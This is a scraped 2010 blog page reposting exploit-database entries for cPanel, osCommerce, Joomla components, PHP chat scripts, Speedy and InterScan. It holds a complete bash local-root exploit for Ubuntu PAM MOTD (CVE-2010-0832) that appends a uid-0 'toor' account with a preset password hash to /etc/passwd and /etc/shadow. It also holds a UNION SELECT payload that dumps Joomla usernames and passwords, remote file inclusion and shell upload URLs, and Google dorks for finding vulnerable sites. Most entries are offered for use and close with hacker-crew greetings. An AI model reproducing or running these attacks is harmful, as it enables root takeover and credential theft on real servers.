All about information from internet

Cpanel v11.25 CSRF Add FTP Account Exploit

admin — Wed, 21 Jul 2010 05:36:11 +0000

# Exploit Title: Cpanel 11.25 - [CSRF] Add FTP Account
# Author: G0D-F4Th3r
# Software Link: http://www.cpanel.net/
# Version: 11.25

#######################Exploit#######################################

###########################################################################
Greetz to : AL-MoGrM - dEvIL NeT - Bad hacker - v4-team members - And All My
Friends
###########################################################################

EZ-Oscommerce 3.1 Remote File Upload

admin — Wed, 21 Jul 2010 04:46:40 +0000

====================================================
EZ-Oscommerce 3.1 Remote File Upload
====================================================

########################################################################
# Vendor: http://www.ezosc.com
# Date: 2010-05-27
# Author : indoushka
# Thanks to : Inj3ct0r.com,Exploit-DB.com,SecurityReason.com,Hack0wn.com !
# Contact : indoushka@hotmail.com
# Home : www.arab-blackhat.co.cc
# Dork :Powered by osCommerce | Customized by EZ-Oscommerce
# Bug : Remote File Upload
# Tested on : windows SP2 Fran?ais V.(Pnx2 2.0)
########################################################################

# Exploit By indoushka

EZ-Oscommerce 3.1 - Remote File Upload

UPLOAD FILE:

CREATE FILE:

Dz-Ghost Team ===== Saoucha * Star08 * Redda * theblind74 * XproratiX * onurozkan * n2n * Meher Assel ===========================
all my friend :
His0k4 * Hussin-X * Rafik * Yashar * SoldierOfAllah * RiskY.HaCK * Stake * r1z * D4NB4R * www.alkrsan.net * MR.SoOoFe * ThE g0bL!N
(cr4wl3r Let the poor live ) * RoAd_KiLlEr * AnGeL25dZ * ViRuS_Ra3cH
———————————————————————————————————————————

Mayasan Portal v2.0 (haberdetay.asp) SQL Injection Vulnerability

admin — Wed, 21 Jul 2010 04:45:29 +0000

########################################################

Mayasan Portal v2.0 (haberdetay.asp?id) SQL Injection Vulnerability

########################################################

Author : CoBRa_21

Author Web Page : http://www.ipbul.org

Download Page : http://scripti.org/indir.php?id=632

########################################################

Sql Injection:

http://localhost/[path]/haberdetay.asp?id=29 (Sql)

########################################################

Joomla Component com_spa SQL Injection Vulnerability

admin — Wed, 21 Jul 2010 04:44:51 +0000

====================================================
Joomla Component com_spa SQL Injection Vulnerability
====================================================

Author : altbta
Email : [l_9[at]hotmail[dot]com]
Homepage : { www.xp10.com/xp10 }
DORK : inurl:”index.php?option=com_spa”
===================================================

[+] Vulnerable File :
http://www.site.com/index.php?option=com_spa&view=spa_read_more&pid=[SQL]

[+] ExploiT :
-35 UNION SELECT 1,2,3,4,concat(username,0×3a,password),6,7,8,9,10,11,12,13
from jos_users–

[+] Example :
http://www.site.com/index.php?option=com_spa&view=spa_read_more&pid=-35UNION
SELECT 1,2,3,4,concat(username,0×3a,password),6,7,8,9,10,11,12,13 from
jos_users–

[+] Demo :
http://www.site.com/index.php?option=com_spa&view=spa_read_more&pid=-35%20UNION%20SELECT%201,2,3,4,concat(username,0×3a,password),6,7,8,9,10,11,12,13%20from%20jos_users–

Ubuntu PAM MOTD Local Root Exploit

admin — Wed, 21 Jul 2010 04:43:51 +0000

#!/bin/bash
#
# Exploit Title: Ubuntu PAM MOTD local root
# Date: July 9, 2010
# Author: Anonymous
# Software Link: http://packages.ubuntu.com/
# Version: pam-1.1.0
# Tested on: Ubuntu 9.10 (Karmic Koala), Ubuntu 10.04 LTS (Lucid Lynx)
# CVE: CVE-2010-0832
# Patch Instructions: sudo aptitude -y update; sudo aptitude -y install libpam~n~i
# References: http://www.exploit-db.com/exploits/14273/ by Kristian Erik Hermansen
#
# Local root by adding temporary user toor:toor with id 0 to /etc/passwd & /etc/shadow.
# Does not prompt for login by creating temporary SSH key and authorized_keys entry.
#
# user@ubuntu:~$ bash ubuntu-pam-motd-localroot.sh
# [*] Ubuntu PAM MOTD local root
# [*] Backuped /home/user/.ssh/authorized_keys
# [*] SSH key set up
# [*] Backuped /home/user/.cache
# [*] spawn ssh
# [+] owned: /etc/passwd
# [*] spawn ssh
# [+] owned: /etc/shadow
# [*] Restored /home/user/.cache
# [*] Restored /home/user/.ssh/authorized_keys
# [*] SSH key removed
# [+] Success! Use password toor to get root
# Password:
# root@ubuntu:/home/user# id
# uid=0(root) gid=0(root) groupes=0(root)
#
P=’toor:x:0:0:root:/root:/bin/bash’
S=’toor:$6$tPuRrLW7$m0BvNoYS9FEF9/Lzv6PQospujOKt0giv.7JNGrCbWC1XdhmlbnTWLKyzHz.VZwCcEcYQU5q2DLX.cI7NQtsNz1:14798:0:99999:7:::’
echo “[*] Ubuntu PAM MOTD local root”
[ -z "$(which ssh)" ] && echo “[-] ssh is a requirement” && exit 1
[ -z "$(which ssh-keygen)" ] && echo “[-] ssh-keygen is a requirement” && exit 1
[ -z "$(ps -u root |grep sshd)" ] && echo “[-] a running sshd is a requirement” && exit 1
backup() {
[ -e "$1" ] && [ -e "$1".bak ] && rm -rf “$1″.bak
[ -e "$1" ] || return 0
mv “$1″{,.bak} || return 1
echo “[*] Backuped $1″
}
restore() {
[ -e "$1" ] && rm -rf “$1″
[ -e "$1".bak ] || return 0
mv “$1″{.bak,} || return 1
echo “[*] Restored $1″
}
key_create() {
backup ~/.ssh/authorized_keys
ssh-keygen -q -t rsa -N ” -C ‘pam’ -f “$KEY” || return 1
[ ! -d ~/.ssh ] && { mkdir ~/.ssh || return 1; }
mv “$KEY.pub” ~/.ssh/authorized_keys || return 1
echo “[*] SSH key set up”
}
key_remove() {
rm -f “$KEY”
restore ~/.ssh/authorized_keys
echo “[*] SSH key removed”
}
own() {
[ -e ~/.cache ] && rm -rf ~/.cache
ln -s “$1″ ~/.cache || return 1
echo “[*] spawn ssh”
ssh -o ‘NoHostAuthenticationForLocalhost yes’ -i “$KEY” localhost true
[ -w "$1" ] || { echo “[-] Own $1 failed”; restore ~/.cache; bye; }
echo “[+] owned: $1″
}
bye() {
key_remove
exit 1
}
KEY=”$(mktemp -u)”
key_create || { echo “[-] Failed to setup SSH key”; exit 1; }
backup ~/.cache || { echo “[-] Failed to backup ~/.cache”; bye; }
own /etc/passwd && echo “$P” >> /etc/passwd
own /etc/shadow && echo “$S” >> /etc/shadow
restore ~/.cache || { echo “[-] Failed to restore ~/.cache”; bye; }
key_remove
echo “[+] Success! Use password toor to get root”
su -c “sed -i ‘/toor:/d’ /etc/{passwd,shadow}; chown root: /etc/{passwd,shadow}; \
chgrp shadow /etc/shadow; nscd -i passwd >/dev/null 2>&1; bash” toor

PHP Chat for 123 Flash Chat Remote File Inclusion Vulnerability

admin — Wed, 21 Jul 2010 04:42:52 +0000

*# Exploit Title: php_chat Remote File inclusion Vulnerability
# Date: 2010/07/20
# Author: HaCkEr arar
# Email: y.0@hotmail.de
# My Sites : www.vbspiders.com
# Script home:
http://www.opensourcescripts.com/dir/PHP/Chat/php_chat_module_for123_flash_chat_4902.html
# Tested on: Windows
# Team hacker:HaCkEr aRaR & ViRuS Qalaa >>>X-MaN HaCk3r TeaM
# ViRuS Qalaa: em9@live.com
:::::::::::::::::::::::::
=================Exploit=================

-=[ vuln c0de ]=-
include(’db/’.$select_db.’.php’);
login_chat.php
Line:41

—-exploit—-

http://{localhost}/{path}login_chat.php?select_db=shell.txt?

———greatz———-
Greatz to :
ViRuS Qalaa,VoLc4n0,Members www.j1q1.com

and My friends Others and My friends in MSN
EnJoY o_O*

Joomla Component JE Section Finder LFI Vulnerability

admin — Sun, 27 Jun 2010 03:17:54 +0000

Name : Joomla jesectionfinder LFI Vulnerability
Date : june, 26 2010
Critical Level : HIGH
Vendor Url : http://joomlaextensions.co.in/component/awd_song/
Google Dork: inurl:/component/jesectionfinder/
Price:$25.00
Author : Sid3^effects aKa HaRi
special thanks to : r0073r (inj3ct0r.com),L0rd CruSad3r,MaYur,MA1201,KeDar,Sonic,gunslinger_
greetz to :www.topsecure.net ,All ICW members and my friends luv y0 guyz
############################################################
Description:
This component for web-based business that specialises in buying and selling sections nationwide. Our aim is easy to connect the seller of

land directly to the buyer, its simple.

Easy to handle that component functionallity.

User can add your section/property into particular listing option. Listing option manages from the backend. User selects his plan (Listing

option) and enters property detail (with images). After use see that preview and make it payment. If user makes it payment successfully

than it display automating otherwise his listing not published.
User searches property and contact seller for more detail.

###########################################################

DEMO URL : http://server/propertyfinder/component/jesectionfinder/?view=[LFI]

###########################################################

Joomla Component JE Story Submit SQL Injection Vulnerability

admin — Sun, 27 Jun 2010 03:17:15 +0000

Exploit Title: Joomla JE Story submit SQL Injection
Vendor url:http://joomlaextensions.co.in
Version:1.4
Greetz to:r0073r (inj3ct0r.com), Sid3^effects, MaYur, MA1201, Sonic Bluehat, Sai, KD, M4n0j.
Special Greetz: Topsecure.net, inj3ct0r Team ,Andhrahackers.com
Shoutzz:- To all ICW members.

Description:
100% MVC structure follow. User can add your stories in joomla article.

Front end:

User can add stories. Admin and users get mail after user adds the story. Admin approve than show up in front-end. CAPTCHA code feature is available in front end side. User can upload images.

Back end:

Admin can configure the section, category and email address.
For Joomla Version: Joomla 1.5. Login here for free download.
Also admin can select the category and section what ever they want. Select section functionality using Ajax.
Admin email format also user email format setting from back-end. Easy to make or change email format using wysing editor.
Admin can disable and enable the category/section selection option.

Support the Joomla 1.5.

Features:-
- Admin can configure the section, category and email address.
- Easy to make or change email format using wysing editor in the back end.
- User can add story. Admin and users get mail after user adds the story.
- Putting the CAPTCHA code for security.
- User can upload images from front end.
- Admin approve than show up in front-end.

Vulnerability:

*SQLi Vulnerability

DEMO URL :

http://www.example.com/component/jesubmit/?view=[sqli]

# 0day n0 m0re #
# L0rd CrusAd3r #

Speedy v1.0 Remote Shell Upload Vulnerability

admin — Sun, 27 Jun 2010 03:15:59 +0000

# Author: ViRuS Qalaa
# Email: h1g@hotmail.it
# My Sites : www.pal-mafia.com & www.vbspiders.com
# Script home: http://www.speedy-up.com/
# Tested on: Windows
# Team hacker:ViRuS Qalaa & HaCkEr aRaR & ViRuS KSA>>>X-MaN HaCk3r TeaM
:::::::::::::::::::::::::
=================Exploit=================
DorK:No DorK In MY Exploit

First Upload your shell.php.gif on The Script Speedy 1,0

—-exploit—-
I will show you the direct download link list in your browser and enjoy Blcl

your link shell licke
http://{localhost}/{path}/uploads/Speedy_7296144526.gif

———greatz———-
Greatz to :
hacker arar,ViRuS KSA,Q2,MR.WwW,MR.Romio hacker,black.jaguar

and My friends Others and My friends in MSN
EnJoY o_O

Local Privilege Escalation in InterScan Web Security Virtual

admin — Sat, 26 Jun 2010 00:22:15 +0000

Advisory Name: Local Privilege Escalation in InterScan Web Security Virtual
Apliance 5.0
Internal Cybsec Advisory Id: 2010-0604
Vulnerability Class: Local Privilege Escalation
Release Date: 22-06-2010
Affected Applications: InterScan Web Security Virtual Aplliance 5.0. Other versions may be affected
Affected Platforms: Red Hat nash 5.1
Local / Remote: Local
Severity: Medium - CVSS: 6.8 (AV:L/AC:L/Au:S/C:C/I:C/A:C)
Researcher: Ivan Huertas
Vendor Status: Patched
Reference to Vulnerability Disclosure Policy: http://www.cybsec.com/vulnerability_policy.pdf

Vulnerability Description:
InterScan Web Security Virtual Appliance has a shell called “uihelper” that has suid bit on. So it could be possible to execute commands as root. Also using the vulnerability “Arbitrary File Upload” remote commands could be run as root.

http://www.exploit-db.com/sploits/cybsec_advisory_2010_0604_InterScan_Web_Security_5_0_Local_Privilege_Escalation.pdf